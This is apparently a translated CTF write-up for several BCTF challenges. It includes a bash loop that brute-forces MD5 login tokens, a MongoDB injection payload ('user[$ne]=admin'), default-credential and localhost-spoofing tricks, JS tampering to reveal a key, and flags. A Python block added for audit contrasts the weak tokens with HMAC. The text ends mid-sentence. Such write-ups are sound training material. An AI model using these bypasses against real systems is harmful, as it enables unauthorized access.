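I was off canvassing for votes this time, so I only solved three easy challenges; the platform reopens tomorrow and I will keep learning then.
I only did these challenges after the competition was over, so my flags may differ from everyone else's.
That's all for now; I've had some other things going on lately, orz.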

MISC

First Time Here (初来乍到): 100

A freebie.
Follow the Baidu bctf account; once she follows you back, look at her company information.

WEB

Just a Matter of Minutes (分分钟而已): 100

The submitted id is an MD5 hash; looking the hashes up gives the following:
e958c26cb69fb763faeb2849076d78f4 H.shao478
20e8c6b8771ed6f565e6c251b319519a Angelia689
07b5511fb9e036990211eff978b1ee16 Lamos508
8d44a8f03ab5f71ce78ae14509a03453 Ray300
Each login id's token is an MD5 hash; once cracked, it is the id followed by a 3-digit number, so I guessed Alice's uses the same format.

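#!/bin/bash
#script:web100.sh
#usage:web100.sh
# Try md5("Alice" + 3-digit number) as the id until the page answers with "Hi! "
for num in {100..999}
do
    # md5 is the BSD/macOS command; on Linux use: md5sum | cut -d' ' -f1
    id_md5=$(printf '%s' "Alice$num" | md5)
    res=$(curl -s "http://218.2.197.237:8081/472644703485f950e3b746f2e3818f49/index.php?id=$id_md5" | grep 'Hi! ')
    # $? is the exit status of grep, the last command in the pipeline
    if [ $? -eq 0 ]
    then
        echo "md5(Alice$num)=$id_md5"
        echo "$res"
        exit
    fi
done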

$ bash web100.sh
md5(Alice478)=d482f2fc6b29a4605472369baf8b3c47
<br />Hi! Alice<br />Personal Information:d4b2758da0205c1e0aa9512cd188002a.php
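
The token format inferred above leaves only 900 possible values per id, which is why the loop finishes so quickly. As an added example (not part of the original writeup or the challenge's code), the Python below audits whether a token can be derived from the id alone and contrasts it with a keyed token; SERVER_KEY, the function names and the sample id are assumptions.

```python
import hashlib
import hmac
import secrets

def weak_token(user_id, number):
    # Format the writeup infers from the cracked hashes: md5(id + 3-digit number)
    return hashlib.md5("{}{}".format(user_id, number).encode()).hexdigest()

def weak_candidates(user_id):
    # Every token this scheme can issue for one id: the loop's range 100..999
    return {weak_token(user_id, n) for n in range(100, 1000)}

def is_guessable(user_id, token):
    # Audit check for a token store: is the token derivable from the public id?
    return token.lower() in weak_candidates(user_id)

# Hardened alternative (an assumption, not the challenge's code): bind the id
# to a random server-side key with HMAC-SHA256, so the id and the token format
# no longer determine a small candidate set.
SERVER_KEY = secrets.token_bytes(32)  # hypothetical per-deployment secret

def strong_token(user_id, key=SERVER_KEY):
    return hmac.new(key, user_id.encode(), hashlib.sha256).hexdigest()

def verify_strong(user_id, token, key=SERVER_KEY):
    # Constant-time comparison avoids leaking how many characters matched
    return hmac.compare_digest(strong_token(user_id, key), token)

if __name__ == "__main__":
    uid = "Bob"                  # constructed sample id
    old = weak_token(uid, 123)   # constructed sample token in the weak format
    new = strong_token(uid)
    print("candidates per id:", len(weak_candidates(uid)))
    print("weak token guessable:", is_guessable(uid, old))
    print("keyed token guessable:", is_guessable(uid, new))
    print("keyed token verifies:", verify_strong(uid, new))
```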

http://218.2.197.237:8081/472644703485f950e3b746f2e3818f49/d4b2758da0205c1e0aa9512cd188002a.php
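The page shows the BackTrack 5 desktop wallpaper; the page source contains a hint.
POST:key=the quieter you become the more you are able to hear
response 301 Moved Permanently
The page source now additionally contains flag-in-config.php.bak
But opening that file only shows a funny face drawn with characters, so I tried requesting config.php.bak instead.
The file content is a string: [][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])……
Paste it into the browser console and press Enter, and the result comes out.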

Hard to Tell Real from Fake (真假难辨): 200

tips:You must login at host computer
POST: ip=127.0.0.1
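It asks for a username and password; trying admin / admin gets in, and behind the login is a game.
Why is it so gory? Ugh!
Debug the JS, breaking at initialize:function() and update:function(duration),
then slightly change the code toward the end of the update function: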

if(!cnGame.collision.col_Between_Rects(this.player.getRect(),this.end.getRect())){
    if(this.deadghost != 10){
        this.key = authnum(this.key, 10);

With that change made, let it run.
An alert box pops up: The Key is:BCTF{2097959%2400|abcdefgabc}

Squeezing In Through Any Gap (见缝插针): 300 (unfinished)

The page source hints at a backup file, which contains part of the code that handles the submission:

if(strlen($key) != 15){}
$regex = "/[\w]{0,4}.[\W\d]{0,4}[A-F]{2}[\W\d]{2}[\d]{0,4}/i";
if(preg_match($regex, $key)){}
// so key=aaaax1111AA!!11

Unfinished

Tip of the Iceberg (冰山一角): 400 (unfinished)

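The hint is SQLi. A friend said a port scan would reveal a MongoDB service, but by the time I scanned, the port was no longer open to the outside.
Putting these hints together, it is probably MongoDB SQLi.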
POST: user[$ne]=admin&pwd[$ne]=admin&Submit=Submit
The returned page contains a hint: you_guys_fxxking_smart.php/jpg

PPC & CRYPTO

Chaos Combination Lock (混沌密码锁): 100

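#!/usr/bin/env python
# -*- coding:utf-8 -*-
#script:encode.py
#usage:encode.py
# Python 2. f (a dict mapping names such as 'fun1' to functions) and answer
# are not defined in this excerpt; they are assumed to come from the
# challenge's own script.
def main():
    # Try every chain of four functions built from these function numbers
    funx='1345789'
    funy=[ a+b+c+d for a in funx for b in funx for c in funx for d in funx ]
    for fun_s in funy:
        f1='fun'+fun_s[0]
        f2='fun'+fun_s[1]
        f3='fun'+fun_s[2]
        f4='fun'+fun_s[3]
        try:
            answer_hash = f['fun6'](f['fun2'](f[f1](f[f2](f[f3](f[f4](answer))))))
            print f1,f2,f3,f4
            print answer_hash
        except Exception:
            # This chain cannot be applied to answer; try the next one
            continue

if __name__ == '__main__':
    main()
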
$ python encode.py
fun3 fun5 fun1 fun4
我在想你在想我什么的用谷歌翻译肯定一点不好用还是别用了看这句话纠结死你觉得呢
#answer_hash=user_hash
#next, solve for user

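# -*- coding:utf-8 -*-
# Python 2. answer, reverse, dec2hex and hex2dec are assumed to come from the challenge's own script.
import binascii
import zlib

def main():
    f1='fun3'
    f2='fun5'
    f3='fun1'
    f4='fun4'
    userhash='我在想你在想我什么的用谷歌翻译肯定一点不好用还是别用了看这句话纠结死你觉得呢'
    ans_hash = zlib.decompress(binascii.unhexlify(reverse(dec2hex(answer))))
    user = hex2dec(reverse(binascii.hexlify(zlib.compress(ans_hash,1))))
    print user

if __name__ == '__main__':
    main()
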
$ python decode.py
78864179732635837913920409948348078659913609452869425042153399132863903834522365250250429645163517228356622776978637910679538418927909881502654275707069810737850807610916192563069593664094605159740448670132065615956224727012954218390602806577537456281222779015
$ nc 218.2.197.242 9991
#BCTF{py7h0n-l1b-func7i0ns-re4lly-str4nge}

Meeting an Old Friend Far from Home (他乡遇故知): 200 (unfinished)

http://www.matrix67.com/blog/archives/301
Tupper_self_referential_formula.py

LOL,I think they